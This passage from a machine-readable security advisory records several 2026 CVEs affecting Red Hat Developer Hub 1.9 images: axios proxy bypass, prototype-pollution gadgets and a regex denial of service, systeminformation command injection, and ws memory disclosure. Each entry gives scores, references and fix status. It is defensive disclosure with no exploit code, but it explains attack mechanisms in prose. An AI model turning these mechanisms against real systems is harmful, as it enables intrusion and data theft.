"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2487938"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Axios, a promise-based HTTP client. This vulnerability occurs because Axios does not properly normalize IPv4-mapped IPv6 addresses. When a NO_PROXY setting is configured to block direct access to specific IPv4 addresses, an attacker can bypass this restriction by using the IPv4-mapped IPv6 form of the address in a request URL. This allows the request to be routed through the proxy, potentially exposing internal services or sensitive information that should otherwise be inaccessible.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "axios: Axios: Proxy bypass via IPv4-mapped IPv6 address non-normalization",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64"
],
"known_not_affected": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-44492"
},
{
"category": "external",
"summary": "RHBZ#2487938",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2487938"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-44492",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-44492"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-44492",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44492"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/security/advisories/GHSA-pjwm-pj3p-43mv",
"url": "https://github.com/axios/axios/security/advisories/GHSA-pjwm-pj3p-43mv"
}
],
"release_date": "2026-06-11T15:29:13.890000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-06-30T15:00:33+00:00",
"details": "For more about Red Hat Developer Hub, see References links",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:33574"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 8.6,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "axios: Axios: Proxy bypass via IPv4-mapped IPv6 address non-normalization"
},
{
"cve": "CVE-2026-44494",
"cwe": {
"id": "CWE-915",
"name": "Improperly Controlled Modification of Dynamically-Determined Object Attributes"
},
"discovery_date": "2026-06-11T17:01:12.945664+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2487942"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Axios. This vulnerability, a Prototype Pollution \"Gadget\" attack, allows an attacker to escalate any existing Object.prototype pollution in an application\u0027s dependency tree into a full Man-in-the-Middle (MITM) attack. This enables the attacker to intercept, read, and modify all HTTP traffic, including sensitive authentication credentials. The flaw occurs because the `config.proxy` setting is susceptible to prototype pollution, allowing an attacker to inject a malicious proxy server.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "axios: Axios: Man-in-the-Middle (MITM) attack via Prototype Pollution",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64"
],
"known_not_affected": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-44494"
},
{
"category": "external",
"summary": "RHBZ#2487942",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2487942"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-44494",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-44494"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-44494",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44494"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/security/advisories/GHSA-35jp-ww65-95wh",
"url": "https://github.com/axios/axios/security/advisories/GHSA-35jp-ww65-95wh"
}
],
"release_date": "2026-06-11T15:32:03.155000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-06-30T15:00:33+00:00",
"details": "For more about Red Hat Developer Hub, see References links",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:33574"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 8.7,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "axios: Axios: Man-in-the-Middle (MITM) attack via Prototype Pollution"
},
{
"cve": "CVE-2026-44495",
"cwe": {
"id": "CWE-915",
"name": "Improperly Controlled Modification of Dynamically-Determined Object Attributes"
},
"discovery_date": "2026-06-11T17:00:53.999811+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2487937"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Axios, a promise-based HTTP client. This vulnerability involves prototype pollution gadgets in the request configuration processing. If another vulnerability has already polluted the Object.prototype.transformResponse, affected Axios versions may incorrectly interpret this inherited value as part of the request configuration or as an option validator. Axios does not itself create the prototype pollution. Exploitability requires a separate prototype-pollution vulnerability or equivalent attacker control over Object.prototype before Axios creates a request.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "axios: Axios: Information disclosure due to prototype pollution vulnerability",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64"
],
"known_not_affected": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-44495"
},
{
"category": "external",
"summary": "RHBZ#2487937",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2487937"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-44495",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-44495"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-44495",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44495"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/security/advisories/GHSA-3g43-6gmg-66jw",
"url": "https://github.com/axios/axios/security/advisories/GHSA-3g43-6gmg-66jw"
}
],
"release_date": "2026-06-11T15:33:12.433000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-06-30T15:00:33+00:00",
"details": "For more about Red Hat Developer Hub, see References links",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:33574"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 7.0,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:L",
"version": "3.1"
},
"products": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "axios: Axios: Information disclosure due to prototype pollution vulnerability"
},
{
"cve": "CVE-2026-44496",
"cwe": {
"id": "CWE-1333",
"name": "Inefficient Regular Expression Complexity"
},
"discovery_date": "2026-06-11T17:01:15.856386+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2487943"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Axios. A remote attacker, by influencing the XSRF cookie name in a browser environment, could cause the application to construct a regular expression that leads to excessive processing. This can result in a client-side Denial of Service (DoS), where the affected browser tab may freeze, impacting the availability of the application for the user.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "axios: Axios: Client-side Denial of Service via unescaped regex metacharacters in XSRF cookie name",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64"
],
"known_not_affected": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-44496"
},
{
"category": "external",
"summary": "RHBZ#2487943",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2487943"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-44496",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-44496"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-44496",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44496"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/security/advisories/GHSA-hfxv-24rg-xrqf",
"url": "https://github.com/axios/axios/security/advisories/GHSA-hfxv-24rg-xrqf"
}
],
"release_date": "2026-06-11T15:34:28.492000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-06-30T15:00:33+00:00",
"details": "For more about Red Hat Developer Hub, see References links",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:33574"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "axios: Axios: Client-side Denial of Service via unescaped regex metacharacters in XSRF cookie name"
},
{
"cve": "CVE-2026-44724",
"cwe": {
"id": "CWE-78",
"name": "Improper Neutralization of Special Elements used in an OS Command (\u0027OS Command Injection\u0027)"
},
"discovery_date": "2026-05-27T21:02:14.837088+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2482416"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in systeminformation, a Node.js library. This vulnerability allows a local attacker on Linux to inject arbitrary commands. This occurs when an active NetworkManager connection profile name contains shell metacharacters, which are not properly sanitized before being used in shell commands. Successful exploitation can lead to arbitrary code execution.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "systeminformation: systeminformation: Command injection via NetworkManager connection profile name",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64"
],
"known_not_affected": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-44724"
},
{
"category": "external",
"summary": "RHBZ#2482416",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2482416"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-44724",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-44724"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-44724",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44724"
},
{
"category": "external",
"summary": "https://github.com/sebhildebrandt/systeminformation/security/advisories/GHSA-hvx9-hwr7-wjj9",
"url": "https://github.com/sebhildebrandt/systeminformation/security/advisories/GHSA-hvx9-hwr7-wjj9"
}
],
"release_date": "2026-05-27T19:26:28.392000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-06-30T15:00:33+00:00",
"details": "For more about Red Hat Developer Hub, see References links",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:33574"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability.",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "systeminformation: systeminformation: Command injection via NetworkManager connection profile name"
},
{
"cve": "CVE-2026-45736",
"cwe": {
"id": "CWE-824",
"name": "Access of Uninitialized Pointer"
},
"discovery_date": "2026-05-15T16:00:55.786944+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2477914"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in ws, an open source WebSocket client and server for Node.js. The `websocket.close()` implementation is vulnerable to uninitialized memory disclosure when a `TypedArray` is passed as the reason argument. This can lead to the disclosure of sensitive information from uninitialized memory.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "ws: ws: Uninitialized memory disclosure via `websocket.close()` with `TypedArray`",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This Important vulnerability in the `ws` WebSocket library for Node.js could lead to sensitive information disclosure. The flaw occurs when a `TypedArray` is specifically provided as the `reason` argument to the `websocket.close()` function, potentially exposing uninitialized memory. Red Hat products utilizing this library may be affected if their implementations allow for such a crafted `close()` call.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64"
],
"known_not_affected": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-45736"
},
{
"category": "external",
"summary": "RHBZ#2477914",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2477914"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-45736",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-45736"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-45736",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-45736"
},
{
"category": "external",
"summary": "https://github.com/websockets/ws/commit/c0327ec15a54d701eb6ccefaa8bef328cfc03086",
"url": "https://github.com/websockets/ws/commit/c0327ec15a54d701eb6ccefaa8bef328cfc03086"
},
{
"category": "external",
"summary": "https://github.com/websockets/ws/security/advisories/GHSA-58qx-3vcg-4xpx",
"url": "https://github.com/websockets/ws/security/advisories/GHSA-58qx-3vcg-4xpx"
}
],
"release_date": "2026-05-15T14:53:57.263000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-06-30T15:00:33+00:00",
"details": "For more about Red Hat Developer Hub, see References links",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:33574"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64",
